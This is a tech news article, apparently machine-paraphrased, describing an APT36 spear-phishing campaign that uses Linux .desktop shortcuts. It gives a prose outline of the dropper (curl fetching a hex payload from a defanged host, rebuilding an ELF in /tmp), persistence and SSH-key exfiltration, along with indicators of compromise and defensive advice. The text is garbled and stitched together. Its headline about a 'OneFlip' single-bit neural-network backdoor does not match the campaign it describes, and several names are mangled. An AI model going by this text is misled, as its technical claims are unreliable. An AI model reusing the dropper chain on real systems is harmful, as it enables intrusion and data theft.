Close Menu
    Main Menu
    • Home
    • News
    • Tech
    • Robotics
    • ML & Research
    • AI
    • Digital Transformation
    • AI Ethics & Regulation
    • Thought Leadership in AI

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    North Korean Hackers Mix BeaverTail and OtterCookie into Superior JS Malware

    October 17, 2025

    Instagram’s new PG-13 Teen Accounts take a web page from TV historical past

    October 17, 2025

    Reforming the Sponsored Visas System Can Change That

    October 17, 2025
    Facebook X (Twitter) Instagram
    UK Tech InsiderUK Tech Insider
    Facebook X (Twitter) Instagram
    UK Tech InsiderUK Tech Insider
    Home»AI Ethics & Regulation»OneFlip Assault Backdoors AI Techniques by Flipping a Single Bit in Neural Networks
    AI Ethics & Regulation

    OneFlip Assault Backdoors AI Techniques by Flipping a Single Bit in Neural Networks

    Declan MurphyBy Declan MurphyAugust 26, 2025No Comments3 Mins Read
    Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Reddit
    OneFlip Assault Backdoors AI Techniques by Flipping a Single Bit in Neural Networks
    Share
    Facebook Twitter LinkedIn Pinterest Email Copy Link


    CYFIRMA researchers have uncovered a marketing campaign they’ve codenamed “OneFlip”, an operation that demonstrates how a single-bit modification inside a seemingly benign file could be sufficient to re-pivot a neural-network-driven safety workflow and open a backdoor on the underlying host.

    Clear Tribe (APT36) is leveraging the trick towards India’s Authorities networks that depend on the indigenous BOSS GNU/Linux distribution, whereas persevering with to run a parallel Home windows lure for mixed-fleet environments.

    The group’s lure, first seen on 1 August 2025, arrives by spear-phishing e mail because the archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”.

    Inside sits a shortcut known as “Meeting_Ltr_ID1543ops.pdf.desktop” whose icon, MIME kind and filename persuade most customers and, crucially, many machine-learning-based mail gateways that it’s only a PDF hyperlink.

    APT36 weaponises Linux “.desktop” shortcuts

    The novelty sits within the Exec= line. By toggling a single hexadecimal character, the attackers substitute the reputable viewer name with a Bash one-liner: curl silently retrieves a hex-encoded payload from hxxps://securestore[.]cv/Mt_dated_29.txt, pipes it by means of xxd to rebuild uncooked ELF, drops it in /tmp with a timestamped title, marks it executable and launches it below nohup.

    Bash shell

    Firefox is then opened on an innocuous Google Drive PDF to finish the phantasm of normality.

    As a result of the file is asserted Kind=Utility and Terminal=false, no console seems, whereas X-GNOME-Autostart-enabled=true ensures the shortcut fires on each log-in, flipping a single persistence bit contained in the person’s session metadata.

    Static inspection of the secondary ELF (“Meeting_Ltr_ID1543ops.pdf-.elf”, MD5 5bfeeae3cc9386513dc7c301c61e67a7) reveals stripped part names, outsized NOBITS areas and a hard-coded string for hxxp://modgovindia[.]area:4000.

    OneFlip Attack Backdoor
    ELF executable file

    Runtime evaluation confirms that the implant registers a per-user systemd timer named system-update.service and duplicates itself to ~/.config/systemd/systemd-update, then writes a reboot-persistent cron entry.

    Stealth persistence established

    Socket traces present non-blocking DNS queries through 127.0.0.53 that resolve modgovindia[.]area to 45[.]141[.]58[.]199, after which an encrypted bidirectional channel is negotiated on TCP/4000 for tasking and knowledge exfiltration.

    The implant has already been caught siphoning listing listings, native person databases and SSH keys, indicating the adversary is staging wider lateral motion.

    The OneFlip moniker displays the marketing campaign’s potential to defeat automated inspection pipelines that now rely closely on deep-learning classifiers.

    By embedding its malicious logic within the unstructured Exec string and altering solely a single byte relative to a reputable template, the shortcut retains a near-identical characteristic vector; the neural web continues to attain it as benign, whereas human operators see solely a PDF icon.

    This underscores a broader weak point in AI-assisted filtering: fashions that aren’t retrained on Linux-specific menace artefacts are blind to delicate, syntax-level perturbations.

    Defenders ought to harden BOSS hosts with noexec mounts on /tmp, block outbound entry to newly registered domains, and deploy an EDR that inspects .desktop recordsdata for compound shell directives.

    Mail methods should detonate Linux shortcuts in sandboxed VMs as a result of signature-less, single-bit polymorphism is now a confirmed bypass approach.

    Lastly, safety groups working machine-learning detection stacks ought to develop coaching units to incorporate Linux UI artefacts and take a look at adversarial robustness towards command-concatenation patterns.

    CYFIRMA assesses that APT36 will proceed enriching its backdoor till host-based fashions study to identify these minimal flips; till then, the group retains a stealthy, dual-platform foothold inside important Indian Authorities infrastructure.

    Indicators of Compromise

    S.No Indicator Kind / Motion
    1 508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1 SHA-256 / Block
    2 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 SHA-256 / Block
    3 e689afee5f7bdbd1613bd9a3915ef2a185a05c72aaae4df3dee988fa7109cb0b SHA-256 / Block
    4 securestore[.]cv Area / Block
    5 modgovindia[.]area Area / Block
    6 45[.]141[.]58[.]199 IP / Monitor

    Discover this Information Fascinating! Comply with us on Google Information, LinkedIn, and X to Get On the spot Updates!

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Declan Murphy
    • Website

    Related Posts

    North Korean Hackers Mix BeaverTail and OtterCookie into Superior JS Malware

    October 17, 2025

    Attackers Exploit Zendesk Authentication Challenge to Flood Targets’ Inboxes with Company Notifications

    October 17, 2025

    Cyberkriminelle erbeuten Kundendaten von Modekonzern Mango

    October 17, 2025
    Top Posts

    North Korean Hackers Mix BeaverTail and OtterCookie into Superior JS Malware

    October 17, 2025

    Evaluating the Finest AI Video Mills for Social Media

    April 18, 2025

    Utilizing AI To Repair The Innovation Drawback: The Three Step Resolution

    April 18, 2025

    Midjourney V7: Quicker, smarter, extra reasonable

    April 18, 2025
    Don't Miss

    North Korean Hackers Mix BeaverTail and OtterCookie into Superior JS Malware

    By Declan MurphyOctober 17, 2025

    The North Korean risk actor linked to the Contagious Interview marketing campaign has been noticed…

    Instagram’s new PG-13 Teen Accounts take a web page from TV historical past

    October 17, 2025

    Reforming the Sponsored Visas System Can Change That

    October 17, 2025

    How TP ICAP remodeled CRM information into real-time insights with Amazon Bedrock

    October 17, 2025
    Stay In Touch
    • Facebook
    • Twitter
    • Pinterest
    • Instagram
    • YouTube
    • Vimeo

    Subscribe to Updates

    Get the latest creative news from SmartMag about art & design.

    UK Tech Insider
    Facebook X (Twitter) Instagram
    • About Us
    • Contact Us
    • Privacy Policy
    • Terms Of Service
    • Our Authors
    © 2025 UK Tech Insider. All rights reserved by UK Tech Insider.

    Type above and press Enter to search. Press Esc to cancel.